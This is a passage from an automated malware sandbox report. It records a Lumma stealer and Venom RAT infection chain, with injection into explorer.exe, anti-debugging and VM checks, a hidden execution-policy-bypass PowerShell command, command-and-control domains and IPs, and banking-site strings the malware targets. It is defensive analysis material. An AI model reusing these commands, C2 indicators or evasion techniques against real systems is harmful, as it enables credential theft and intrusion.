rangeDeleteServiceRegEnumKeyExWRegOpenKeyExWStartServiceWCertOpenStoreFindNextFileWFindResourceWGetDriveTypeWMapViewOfFileModule32NextWThread32FirstVirtualUnlockWaitCommEventWriteConsoleWRtlGetVersionRtlInitStringCoTaskMemFreeEnumProcessesShellExecuteWExitWindowsExGetClassNameWtimeEndPeriodFreeAddrInfoWgethostbynamegetservbynameWTSFreeMemoryFindFirstFileWSACloseEventgethostbyaddrgetservbyportWSAResetEventWSAIsBlockingSysFreeStringSafeArrayLockSafeArrayCopyVarI2FromDateVarI2FromDispVarI2FromBoolVarI4FromDateVarI4FromDispVarI4FromBoolVarR4FromDateVarR4FromDispVarR4FromBoolVarR8FromDateVarR8FromDispVarR8FromBoolVarDateFromI2VarDateFromI4VarDateFromR4VarDateFromR8VarDateFromCyVarCyFromDateVarCyFromDispVarCyFromBoolVarBstrFromI2VarBstrFromI4VarBstrFromR4VarBstrFromR8VarBstrFromCyVarBoolFromI2VarBoolFromI4VarBoolFromR4VarBoolFromR8VarBoolFromCyVarUI1FromStrCreateTypeLibClearCustDataLoadTypeLibExVarDecFromUI1VarDecFromStrVarDateFromI1VarBstrFromI1VarBoolFromI1VarUI1FromUI2VarUI1FromUI4VarUI1FromDecVarDecFromUI2VarDecFromUI4VarI1FromDateVarI1FromDispVarI1FromBoolVarUI2FromUI1VarUI2FromStrVarUI2FromUI4VarUI2FromDecVarUI4FromUI1VarUI4FromStrVarUI4FromUI2VarUI4FromDecBSTR_UserSizeBSTR_UserFreeVarI8FromDateVarI8FromDispVarI8FromBoolVarDateFromI8VarBstrFromI8VarBoolFromI8VarUI1FromUI8VarDecFromUI8VarUI2FromUI8VarUI4FromUI8VarUI8FromUI1VarUI8FromStrVarUI8FromUI2VarUI8FromUI4VarUI8FromDecOMAP From SrcInterfaceImplStandAloneSigAssemblyRefOSEFI byte codeMIPS with FPUEFI ROM imageAlign 2-BytesAlign 4-BytesAlign 8-Bytesby_start_timeDRAINING_SUBSDRAINING_PU
                  Source: BitLockerToGo.exe, 0000001F.00000002.2489794130.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2366071084.0000000002F86000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWl;~%
                  Source: IXDaI.exe, 00000005.00000002.1466246003.00000000011D9000.00000004.00000020.00020000.00000000.sdmp, IXDaI.exe, 00000005.00000003.1330174994.00000000011D9000.00000004.00000020.00020000.00000000.sdmp, IXDaI.exe, 00000005.00000003.1337998846.000000000118B000.00000004.00000020.00020000.00000000.sdmp, IXDaI.exe, 00000005.00000002.1466246003.0000000001168000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1447298084.000000000952D000.00000004.00000001.00020000.00000000.sdmp, IXDaI.exe, 00000011.00000002.1680424006.000000000137E000.00000004.00000020.00020000.00000000.sdmp, IXDaI.exe, 00000011.00000002.1680424006.00000000012F8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000002.2489794130.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2366071084.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, vm.exe, 00000025.00000002.3739679273.0000000000575000.00000004.00000020.00020000.00000000.sdmp, vm.exe, 00000025.00000002.3755459555.0000000005590000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                  Source: explorer.exe, 0000000E.00000000.1447298084.00000000093B4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                  Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                  Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                  Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                  Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
                  Source: explorer.exe, 0000000E.00000000.1443804807.00000000008DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000o;
                  Source: explorer.exe, 0000000E.00000000.1447862980.00000000095B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                  Source: explorer.exe, 0000000E.00000000.1447862980.00000000095B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTbrVMWare
                  Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
                  Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                  Source: wscript.exe, 00000028.00000002.2753282593.0000022B5D5A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\H
                  Source: explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                  Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
                  Source: B552.exeBinary or memory string: .brAMDisbetter!AuthenticAMDCentaurHaulsGenuineIntelTransmetaCPUGenuineTMx86Geode by NSCVIA VIA VIA KVMKVMKVMKVMMicrosoft HvVMwareVMwareXenVMMXenVMMbhyve bhyve HygonGenuineVortex86 SoCSiS SiS SiS RiseRiseRiseGenuine RDCECH requiredbad KDF ID: BindCompleteFunct
                  Source: explorer.exe, 0000000E.00000000.1447298084.00000000094DC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %SystemRoot%\system32\mswsock.dlldRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                  Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
                  Source: explorer.exe, 0000000E.00000000.1447862980.00000000095B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 0000000E.00000000.1444506660.0000000002FA0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
                  Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                  Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                  Source: BitLockerToGo.exe, 0000001F.00000002.2489794130.0000000002F4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                  Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
                  Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                  Source: explorer.exe, 0000000E.00000000.1447298084.00000000093B4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
                  Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                  Source: 753F.exe, 0000001C.00000002.2799563492.000001C0F766A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2608130917.0000020A00056000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
                  Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                  Source: lm.exe, 00000026.00000003.2669341057.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696501413p
                  Source: explorer.exe, 0000000E.00000000.1443804807.00000000008DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000/;
                  Source: explorer.exe, 0000000E.00000000.1447862980.00000000095B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: IXDaI.exe, 00000011.00000002.1680424006.0000000001362000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\x
                  Source: wscript.exe, 00000028.00000002.2753282593.0000022B5D5A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: B552.exe, 0000001B.00000002.2355425159.0000023B1B108000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllTTS'P
                  Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                  Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                  Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                  Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                  Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                  Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
                  Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                  Source: lm.exe, 00000026.00000002.2885932416.0000000000645000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8gh%SystemRoot%\system32\mswsock.dll
                  Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeAPI call chain: ExitProcess graph end nodegraph_5-1022
                  Source: C:\Users\user\Desktop\7Y18r(14).exeSystem information queried: ModuleInformationJump to behavior
                  Source: C:\Users\user\Desktop\7Y18r(14).exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Source: C:\Users\user\Desktop\7Y18r(14).exeSystem information queried: CodeIntegrityInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ftejcedSystem information queried: CodeIntegrityInformation
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeCode function: 28_2_00007FF7C08C3238 CheckRemoteDebuggerPresent,28_2_00007FF7C08C3238
                  Source: C:\Users\user\Desktop\7Y18r(14).exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ftejcedProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess queried: DebugPort
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 31_2_02EE9D10 LdrInitializeThunk,31_2_02EE9D10
                  Source: C:\Users\user\Desktop\7Y18r(14).exeCode function: 4_2_004C5044 mov eax, dword ptr fs:[00000030h]4_2_004C5044
                  Source: C:\Users\user\Desktop\7Y18r(14).exeCode function: 4_2_0060092B mov eax, dword ptr fs:[00000030h]4_2_0060092B
                  Source: C:\Users\user\Desktop\7Y18r(14).exeCode function: 4_2_00600D90 mov eax, dword ptr fs:[00000030h]4_2_00600D90
                  Source: C:\Users\user\Desktop\7Y18r(14).exeCode function: 4_2_006E05EE push dword ptr fs:[00000030h]4_2_006E05EE
                  Source: C:\Users\user\AppData\Roaming\ftejcedCode function: 16_2_004C5044 mov eax, dword ptr fs:[00000030h]16_2_004C5044
                  Source: C:\Users\user\AppData\Roaming\ftejcedCode function: 16_2_0050F68E push dword ptr fs:[00000030h]16_2_0050F68E
                  Source: C:\Users\user\AppData\Roaming\ftejcedCode function: 16_2_0067092B mov eax, dword ptr fs:[00000030h]16_2_0067092B
                  Source: C:\Users\user\AppData\Roaming\ftejcedCode function: 16_2_00670D90 mov eax, dword ptr fs:[00000030h]16_2_00670D90
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeMemory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Windows\explorer.exeFile created: ftejced.14.drJump to dropped file
                  Source: C:\Windows\explorer.exeNetwork Connect: 77.221.157.163 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 107.173.160.139 443Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 107.173.160.137 443Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 211.168.53.110 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 162.0.235.84 443Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 64.190.113.113 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 127.0.0.127 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 189.165.133.52 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 167.235.128.153 443Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 185.149.100.242 443Jump to behavior
                  Source: 753F.exe.14.dr, SAPIENHost.csReference to suspicious API methods: FindResource(hINSTANCE, new IntPtr(num), new IntPtr(10))
                  Source: 37.2.vm.exe.4e40000.1.raw.unpack, Keylogger.csReference to suspicious API methods: MapVirtualKey(vkCode, 0u)
                  Source: 37.2.vm.exe.4e40000.1.raw.unpack, DInvokeCore.csReference to suspicious API methods: DynamicAPIInvoke("ntdll.dll", "NtProtectVirtualMemory", typeof(Delegates.NtProtectVirtualMemory), ref Parameters)
                  Source: 37.2.vm.exe.4e40000.1.raw.unpack, AntiProcess.csReference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeMemory allocated: C:\Windows\explorer.exe base: 81C0000 protect: page read and write
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeMemory allocated: C:\Windows\explorer.exe base: B30000 protect: page execute and read and write
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeMemory allocated: C:\Windows\explorer.exe base: 8920000 protect: page execute and read and write
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeMemory allocated: C:\Windows\explorer.exe base: 8940000 protect: page execute and read and write
                  Source: C:\Users\user\AppData\Local\Temp\B552.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2EB0000 protect: page execute and read and write
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeMemory protected: C:\Windows\explorer.exe base: 81C0000 protect: page execute and read and write
                  Source: C:\Users\user\Desktop\7Y18r(14).exeThread created: C:\Windows\explorer.exe EIP: B019D0Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\ftejcedThread created: unknown EIP: 81819D0
                  Source: C:\Users\user\AppData\Local\Temp\B552.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2EB0000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeMemory written: PID: 3968 base: 81C0000 value: 20
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeMemory written: PID: 3968 base: 81C1000 value: 48
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeMemory written: PID: 3968 base: 8940030 value: 00
                  Source: B552.exe, 0000001B.00000002.2349461776.000000C000400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: indexterityszcoxp.shop
                  Source: B552.exe, 0000001B.00000002.2349461776.000000C000400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: lariatedzugspd.shop
                  Source: B552.exe, 0000001B.00000002.2349461776.000000C000400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: callosallsaospz.shop
                  Source: B552.exe, 0000001B.00000002.2349461776.000000C000400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: outpointsozp.shop
                  Source: B552.exe, 0000001B.00000002.2349461776.000000C000400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: liernessfornicsa.shop
                  Source: B552.exe, 0000001B.00000002.2349461776.000000C000400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: upknittsoappz.shop
                  Source: B552.exe, 0000001B.00000002.2349461776.000000C000400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: shepherdlyopzc.shop
                  Source: B552.exe, 0000001B.00000002.2349461776.000000C000400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: unseaffarignsk.shop
                  Source: C:\Users\user\Desktop\7Y18r(14).exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                  Source: C:\Users\user\Desktop\7Y18r(14).exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ftejcedSection loaded: NULL target: C:\Windows\explorer.exe protection: read write
                  Source: C:\Users\user\AppData\Roaming\ftejcedSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeMemory written: C:\Windows\explorer.exe base: 81C0000
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeMemory written: C:\Windows\explorer.exe base: 81C1000
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeMemory written: C:\Windows\explorer.exe base: 8940030
                  Source: C:\Users\user\AppData\Local\Temp\B552.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2EB0000
                  Source: C:\Users\user\AppData\Local\Temp\B552.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2DF1008
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\7760095b.bat" "
                  Source: C:\Users\user\AppData\Local\Temp\B552.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess created: C:\Users\user\AppData\Local\Temp\753F.exe "C:\Users\user\AppData\Local\Temp\753F.exe" -HOSTRUNAS
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedLumma\run.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe "vm.exe"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe "lm.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat" "
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe "vm.exe"
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B93F310 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,CheckTokenMembership,24_2_00007FF70B93F310
                  Source: vm.exe, 00000025.00000002.3743090864.0000000002B56000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000025.00000002.3743090864.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000025.00000002.3743090864.0000000002C34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: explorer.exe, 0000000E.00000000.1444116589.0000000001081000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1445337555.0000000004460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1447862980.00000000095B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: explorer.exe, 0000000E.00000000.1444116589.0000000001081000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                  Source: SciTE.exe.5.drBinary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
                  Source: explorer.exe, 0000000E.00000000.1444116589.0000000001081000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Manager
                  Source: vm.exe, 00000025.00000002.3743090864.0000000002B56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager`,
                  Source: explorer.exe, 0000000E.00000000.1443804807.0000000000889000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman
                  Source: explorer.exe, 0000000E.00000000.1444116589.0000000001081000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                  Source: vm.exe, 00000025.00000002.3743090864.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000025.00000002.3743090864.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000025.00000002.3743090864.0000000002B06000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe
                  Source: vm.exe, 00000025.00000002.3743090864.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000025.00000002.3743090864.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000025.00000002.3743090864.0000000002AE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\
                  Source: C:\Users\user\AppData\Local\Temp\B552.exeQueries volume information: C:\Windows VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\B552.exeQueries volume information: C:\Windows\AppReadiness VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\B552.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\B552.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\B552.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\B552.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeQueries volume information: C:\Users\user\AppData\Local\Temp\753F.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeQueries volume information: C:\Users\user\AppData\Local\Temp\753F.exe VolumeInformation
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
